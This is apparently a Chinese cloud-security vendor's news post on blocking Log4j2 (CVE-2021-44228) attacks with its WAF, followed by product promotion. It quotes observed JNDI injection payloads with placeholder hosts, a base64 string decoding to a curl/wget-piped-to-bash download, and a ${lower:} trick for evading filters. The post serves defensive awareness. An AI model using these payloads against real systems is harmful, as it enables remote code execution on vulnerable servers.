关于我们

质量为本、客户为根、勇于拼搏、务实创新

< 返回新闻公共列表

英拓云超级WAF轻松2步拦截apache log4j2漏洞攻击

发布时间:2022-07-01 11:14:40

       对于大部分互联网用户而言,Apache(阿帕奇)Log4j2是个陌生的词汇。但在很多程序员眼中,它却是陪伴自己的好伙伴,每天用于记录日志。然而,恰恰是这个被无数程序员每天使用的组件出现漏洞了。这个漏洞危害之大,甚至可能超过“永恒之蓝”。

       关于如何缓解 Log4j 中的 CVE-2021-44228、漏洞是如何产生的以及为我们的客户提供的缓解措施,具体有关漏洞修补,网上好多教程,自己搜一下。

       在撰写本文时,由于漏洞的严重性,英拓云也正在为客户推出保护措施,现在有很多关于扫描和尝试利用漏洞的数据,看到被阻止的攻击最大峰值缓慢增加,而且扫描一整天都是连续的,我们看到这种情况还在继续下去。


111.png


经过安全工程师们大量数据分析总结出攻击特征与方法:


控制了该服务器,并记录了 Internet 属性可被利用,这并没有演示太多。

第二个最受欢迎的请求包含以下内容:

${jndi:ldap://x.x.x.x/#Touch}

请求的 User-Agent 字段中:

Mozilla/5.0 ${jndi:ldap://x.x.x.x:5566/ExploitD}/ua


443 的未加密请求,他们试图使用 http://

${jndi:http://x.x.x.x/callback/https-port-443-and-http-callback-scheme}


有人试图冒充 Googlebot 并包含一些额外的信息:

Googlebot/2.1(+http://www.google.com/bot.html)${jndi:ldap://x.x.x.x:80/Log4jRCE}


该方案的一个变体是在漏洞利用负载中包含被攻击网站的名称:

${jndi:ldap://www.app.example.com.gu.c1me2000ssggnaro4eyyb.example.com/www.app.example.com}


一些参与者没有使用 LDAP,而是使用了 DNS。但是,LDAP 是迄今为止最常用的协议:

${jndi:dns://app.example.com/ext}


一个非常有趣的扫描涉及使用 Java 和标准 Linux 命令行工具。有效载荷如下所示:

${jndi:ldap://x.x.x.x:12344/Basic/Command/Base64/KGN1cmwgLXMgeC54LngueDo1ODc0L3kueS55Lnk6NDQsdfdsfdsfIC1PLSB4LngueC54OjU4NzQveS55LnkueTo0NDMpfGJhc2g=}


base64 编码部分解码为 curl 并通过管道传输到 bash 中:

(curl -s x.x.x.x:5874/y.y.y.y:443||wget -q -O- x.x.x.x:5874/y.y.y.y:443)|bash


请注意, curl/wget 的输出不是必需的,因此这只是点击服务器以向参与者表明该漏洞有效。


最后,我们看到了一些积极的尝试,例如${jndi:ldap通过使用 Log4j 的其他功能来逃避对字符串的简单阻塞。例如,一种常见的规避技术似乎是使用以下${lower}特征(小写字符):

${jndi:${lower:l}${lower:d}a${lower:p}://example.com/x



英拓云WAF(Web应用防火墙)产品得解决方案:


1、进入业务平台https://ddos.gxidc.com的用户中心---安全与加速---域名管理—点击具域名–点击《访问控制》

2、找到《自定义规则配置》

3、增加一条UA规则


222.png


4、增加一条URL规则


图片


到此基本可以防完上面所遇到的恶意数据针对log4j2的请求


5、如果还想进一步更加完美双重保障,可以开启超级WAF自能防护功能


444.png


6、遇到攻击,拦截

图片



图片

       英拓云与全国知名的云安全服务提供商共同努力维护互联网信息安全,以全线覆盖全国的云计算节点、云安全服务产品组合、领先的云化支撑运营能力和创新的云加速等优秀技术致力于成为中国顶尖的独立云安全服务提供商和一站式云安全合作平台。


       为客户提供全球范围内抗DDoS攻击、防CC攻击、漏洞扫描、渗透测试、定制cdn加速、WEB应用防火墙、服务器租用、云计算、私有云、互联网疑难杂症解决方案综合服务!


       目前,英拓云已经构建全网超过2000G的超级防御能力,投入巨资自主研发高性能抗DDoS、CC防火墙,始终以客户“零部署”、“零维护”、方便快捷、简单易用为产品研发的基准,打造一站式的综合服务平台,致力于为企事业单位、中小企、互联网金融、电子商务平台、云计算服务商等互联网企业,提供高品质的云安全防御技术解决方案。


图片





/template/Home/Zkeys2/PC/Static